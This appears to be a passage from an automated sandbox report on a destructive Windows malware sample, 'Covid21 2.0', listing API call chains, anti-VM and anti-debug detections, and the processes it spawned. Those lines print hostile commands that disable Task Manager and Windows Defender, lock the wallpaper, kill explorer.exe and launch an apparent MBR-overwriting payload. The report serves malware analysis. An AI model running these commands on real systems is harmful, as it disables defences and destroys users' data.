Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_004360F9 SetWindowTextA,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongA,GetWindowLongA,GetWindowRect,MapWindowPoints,GetWindowLongA,GetWindowRect,GetWindowLongA,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongA,GetMenu,GetWindowLongA,AdjustWindowRectEx,SystemParametersInfoA,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetForegroundWindow,GetFocus,UpdateWindow,SetFocus,18_2_004360F9
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0043536F GetWindowLongA,GetWindowLongA,GetWindowLongA,_strlen,SetWindowPos,EnableWindow,IsWindowVisible,IsIconic,SetWindowLongA,SetWindowLongA,SetWindowLongA,SetWindowPos,ShowWindow,ShowWindow,ShowWindow,18_2_0043536F
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0043C3F2 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,FindWindowA,IsIconic,ShowWindow,AttachThreadInput,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,18_2_0043C3F2
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00439C0E GetAsyncKeyState,GetForegroundWindow,IsIconic,GetWindowRect,18_2_00439C0E
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0044C66D SendMessageA,SendMessageA,SendMessageA,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageA,18_2_0044C66D
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00431E81 SendMessageA,GetWindowLongA,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,SendMessageA,GetWindowLongA,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageA,SetFocus,MapWindowPoints,InvalidateRect,18_2_00431E81
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042CF3C GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,DrawTextA,GetSystemMetrics,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,IsWindowVisible,IsIconic,SendMessageA,GetWindowLongA,SendMessageA,CreateWindowExA,SetWindowLongA,SendMessageA,CreateWindowExA,GetWindowLongA,SendMessageA,SendMessageA,CreateWindowExA,CreateWindowExA,CreateWindowExA,SendMessageA,SendMessageA,CreateWindowExA,SendMessageA,SendMessageA,SendMessageA,GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageA,SelectObject,ReleaseDC,SendMessageA,SendMessageA,GetClientRect,SetWindowLongA,SendMessageA,SetWindowLongA,MoveWindow,GetWindowRect,SendMessageA,SetWindowPos,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,18_2_0042CF3C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_00428FE4 PostMessageA,PostMessageA,SendMessageA,LoadLibraryA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,30_2_00428FE4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_0041F210 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,30_2_0041F210
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_0041E320 IsIconic,GetCapture,30_2_0041E320
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_0041EABA IsIconic,SetWindowPos,30_2_0041EABA
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_0041EABC IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,30_2_0041EABC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_004275F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,30_2_004275F8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_00429678 IsIconic,SetActiveWindow,30_2_00429678
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_004296C0 IsIconic,SetActiveWindow,SetFocus,30_2_004296C0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00440A48 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,6_2_00440A48
Source: C:\Windows\SysWOW64\cmd.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\Covid21 2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Covid21 2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\covid21\Corona.exeCode function: 12_2_004294BC12_2_004294BC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_00426D2013_2_00426D20
Source: C:\Windows\SysWOW64\cmd.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,6_2_0045478C
Source: C:\covid21\Corona.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,12_2_0044C4A0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,13_2_00449A08
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,30_2_00428764
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Users\user\Desktop\Covid21 2.0.exeWindow / User API: threadDelayed 1518Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeAPI coverage: 8.1 %
Source: C:\covid21\Corona.exeAPI coverage: 7.1 %
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeAPI coverage: 4.1 %
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeAPI coverage: 2.9 %
Source: C:\covid21\Corona.exeCode function: 12_2_004294BC12_2_004294BC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_00426D2013_2_00426D20
Source: C:\Users\user\Desktop\Covid21 2.0.exe TID: 6568Thread sleep count: 1518 > 30Jump to behavior
Source: C:\Users\user\Desktop\Covid21 2.0.exe TID: 6568Thread sleep time: -37950s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exe TID: 6664Thread sleep count: 111 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe TID: 7096Thread sleep time: -46000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 7124Thread sleep count: 42 > 30Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 6428Thread sleep count: 41 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6844Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe TID: 6048Thread sleep count: 281 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7056Thread sleep count: 43 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5660Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Covid21 2.0.exeThread sleep count: Count: 1518 delay: -25Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0040850C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,6_2_0040850C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00408604 FindFirstFileA,GetLastError,6_2_00408604
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00405210 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00405210
Source: C:\covid21\Corona.exeCode function: 12_2_00404F24 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00404F24
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_00404EB8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,13_2_00404EB8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0043892A _strlen,FindFirstFileA,FindFirstFileA,FindClose,FindFirstFileA,FindClose,_strcat,18_2_0043892A
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00424873 _strlen,_strcat,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,SetFileAttributesA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,18_2_00424873
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00423AD5 DeleteFileA,FindFirstFileA,_strcat,_strrchr,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,DeleteFileA,FindNextFileA,FindClose,18_2_00423AD5
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0040A357 _strrchr,_strcat,_strlen,_strcat,FindFirstFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,_strlen,FindNextFileA,FindClose,18_2_0040A357
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042C368 FindFirstFileA,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,MoveFileA,DeleteFileA,MoveFileA,CopyFileA,FindNextFileA,FindClose,18_2_0042C368
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00423D09 FindFirstFileA,FindClose,18_2_00423D09
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00423DE4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,18_2_00423DE4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00424DBB _strlen,_strcat,LocalFileTimeToFileTime,GetSystemTimeAsFileTime,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,SetFileTime,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,CreateFileA,SetFileTime,CloseHandle,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,18_2_00424DBB
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042C603 GetFileAttributesA,FindFirstFileA,FindClose,18_2_0042C603
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00439FDC FindFirstFileA,FindClose,GetFileAttributesA,18_2_00439FDC
Source: C:\covid21\Corona.exeCode function: 12_2_0041DBAC GetSystemInfo,12_2_0041DBAC
Source: reg.exe, 00000004.00000002.650947885.0000000003800000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.652831555.0000000002F80000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.662228048.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: reg.exe, 00000004.00000002.650947885.0000000003800000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.652831555.0000000002F80000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.662228048.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: reg.exe, 00000004.00000002.650947885.0000000003800000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.652831555.0000000002F80000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.662228048.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Covid21 2.0.exe, 00000000.00000002.754672702.000000000092B000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Covid21 2.0.exe, 00000000.00000002.754672702.000000000092B000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy
Source: reg.exe, 00000004.00000002.650947885.0000000003800000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.652831555.0000000002F80000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.662228048.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Found API chain indicative of debugger detectionShow sources
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00405EB2 GetTempPathA,LoadLibraryA,GetProcAddress,GetLongPathNameA,FreeLibrary,0_2_00405EB2
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00403B70 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,0_2_00403B70
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00403CC0 SetUnhandledExceptionFilter,0_2_00403CC0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exeCode function: 23_2_004011B0 Sleep,Sleep,SetUnhandledExceptionFilter,GetStartupInfoA,23_2_004011B0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exeCode function: 23_2_00402C58 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,Sleep,TlsGetValue,23_2_00402C58
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exeCode function: 23_2_00402290 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00402290
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeCode function: 27_2_00401179 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,27_2_00401179
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeCode function: 27_2_0040201C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,27_2_0040201C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeCode function: 27_2_00402020 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,27_2_00402020
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0040EFDE _strlen,_strcat,_strlen,_strcat,CreateProcessA,CloseHandle,_strcat,ShellExecuteExA,CloseHandle,_strlen,_strlen,18_2_0040EFDE
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_004132DA keybd_event,VkKeyScanExA,18_2_004132DA
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0041380D mouse_event,18_2_0041380D
Source: C:\Users\user\Desktop\Covid21 2.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe clwcp c:\covid21\covid.jpgJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K coronaloop.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe inv.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe z.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe clwcp c:\covid21\covid.jpgJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe icons.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe screenscrew.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe PayloadMBR.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\covid21\Corona.exe c:\covid21\corona.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp, z.exe, z.exe.0.drBinary or memory string: Program Manager
Source: Covid21 2.0.exe, z.exe, PayloadMBR.exe, 00000024.00000002.791832292.0000000000401000.00000020.00020000.sdmp, z.exe.0.drBinary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000008.00000002.793742315.00000000037C0000.00000002.00000001.sdmp, Corona.exe, 0000000C.00000002.793639619.0000000000CB0000.00000002.00000001.sdmp, inv.exe, 0000000D.00000002.792750728.0000000000D80000.00000002.00000001.sdmp, z.exe, 00000012.00000002.793392786.0000000001C00000.00000002.00000001.sdmp, mlt.exe, 00000017.00000002.792369674.0000000000E90000.00000002.00000001.sdmp, icons.exe, 0000001B.00000002.793032728.0000000001100000.00000002.00000001.sdmp, screenscrew.exe, 0000001E.00000002.793451174.0000000000DC0000.00000002.00000001.sdmp, PayloadMBR.exe, 00000024.00000002.793503258.0000000000E20000.00000002.00000001.sdmpBinary or memory string: Progman
Source: Covid21 2.0.exe, 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp, PayloadMBR.exe, 00000024.00000002.791832292.0000000000401000.00000020.00020000.sdmp, PayloadMBR.exe.0.drBinary or memory string: Windows UpdateShell_TrayWnd
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp, z.exe.0.drBinary or memory string: (preempted: they will resume when the current thread finishes)%s CreateWindoweditShell_TrayWndAutoHotkey2RegClass0x%%%s%s%s.fRequires 1/2/3/Slow/Fast The current thread will exit.msRelativeScreenPress OK to continue.wait
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp, z.exe.0.drBinary or memory string: ?IsHungAppWindowIsHungThreadThe maximum number of MsgBoxes has been reached.groupclasspididahk_%s%uProgram Manager
Source: wscript.exe, 00000008.00000002.793742315.00000000037C0000.00000002.00000001.sdmp, Corona.exe, 0000000C.00000002.793639619.0000000000CB0000.00000002.00000001.sdmp, inv.exe, 0000000D.00000002.792750728.0000000000D80000.00000002.00000001.sdmp, z.exe, 00000012.00000002.793392786.0000000001C00000.00000002.00000001.sdmp, mlt.exe, 00000017.00000002.792369674.0000000000E90000.00000002.00000001.sdmp, icons.exe, 0000001B.00000002.793032728.0000000001100000.00000002.00000001.sdmp, screenscrew.exe, 0000001E.00000002.793451174.0000000000DC0000.00000002.00000001.sdmp, PayloadMBR.exe, 00000024.00000002.793503258.0000000000E20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_004053D4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetLocaleInfoA,6_2_0040B068
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetLocaleInfoA,6_2_0040B0B4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_004054E0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetLocaleInfoA,6_2_00405CCE
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetLocaleInfoA,6_2_00405CD0
